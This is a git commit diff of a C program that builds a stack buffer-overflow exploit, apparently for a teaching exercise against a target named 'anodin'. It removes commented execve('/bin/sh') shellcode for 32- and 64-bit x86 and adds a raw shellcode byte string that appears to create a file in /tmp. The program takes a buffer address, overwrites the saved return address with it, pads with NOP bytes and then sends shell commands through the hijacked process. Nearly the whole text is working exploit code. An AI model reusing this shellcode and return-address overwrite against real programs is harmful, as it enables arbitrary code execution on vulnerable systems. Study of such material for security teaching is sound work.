Integrate shellcode
This commit is contained in:
parent
0cb659ea99
commit
b818407fd0
1 changed files with 6 additions and 39 deletions
|
@ -1,36 +1,8 @@
|
|||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
|
||||
|
||||
unsigned char exploit[1024] = {
|
||||
0x90, 0x90, 0x90, 0x90, // A few nops for some margin
|
||||
0x90, 0x90, 0x90, 0x90,
|
||||
0x90, 0x90, 0x90, 0x90,
|
||||
0x90, 0x90, 0x90, 0x90,
|
||||
|
||||
#ifdef __x86_64__
|
||||
/* 64 bit version */
|
||||
0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next
|
||||
'/','b','i','n','/','s','h','\0',
|
||||
0x5f, // pop the address
|
||||
0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00, // execve system call
|
||||
0x6a, 0x00, // push NULL at the end of the array
|
||||
0x48, 0x89, 0xe2, // envp
|
||||
0x57, // push adress
|
||||
0x48, 0x89, 0xe6, // argv
|
||||
0x0f, 0x05, // system call!
|
||||
#else
|
||||
/* 32 bit version */
|
||||
0xe8, 0x08, 0x00, 0x00, 0x00, // push the address of what is next
|
||||
'/','b','i','n','/','s','h','\0',
|
||||
0x5b, // pop the adress
|
||||
0xb8, 0x0b, 0x00, 0x00, 0x00, // execve system call
|
||||
0x6a, 0x00, // push NULL at the end of the array
|
||||
0x89, 0xe2, // envp
|
||||
0x53, // push adress
|
||||
0x89, 0xe1, // argv
|
||||
0xcd, 0x80, // system call!
|
||||
#endif
|
||||
0xeb,0x24,0x48,0x31,0xff,0x5f,0x68,0xb6,0x01,0x00,0x00,0x48,0x31,0xf6,0x5e,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd7,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e,0x00
|
||||
};
|
||||
|
||||
int main(void) {
|
||||
|
@ -41,21 +13,16 @@ int main(void) {
|
|||
fprintf(stderr,"Type the buf address printed by anodin\n");
|
||||
scanf("%p", &ptr);
|
||||
|
||||
// Un peu de marge
|
||||
ptr += 8;
|
||||
|
||||
// écraser l'adresse de retour
|
||||
for (i = 0; i < 8; i++)
|
||||
exploit_ptr[64/sizeof(void*)+i] = ptr;
|
||||
exploit_ptr[64/sizeof(void*)+i] = ptr;
|
||||
|
||||
for (i=0;i<sizeof(exploit);i++)
|
||||
for (i=0;i<sizeof(exploit);i++)
|
||||
putchar(exploit[i]);
|
||||
|
||||
for (i=0;i<8192;i++)
|
||||
putchar('\n');
|
||||
putchar('\n');
|
||||
|
||||
printf("touch /tmp/ahah\n");
|
||||
printf("echo \"I created file\" /tmp/ahah \\!\n");
|
||||
fflush(stdout);
|
||||
|
||||
return 0;
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue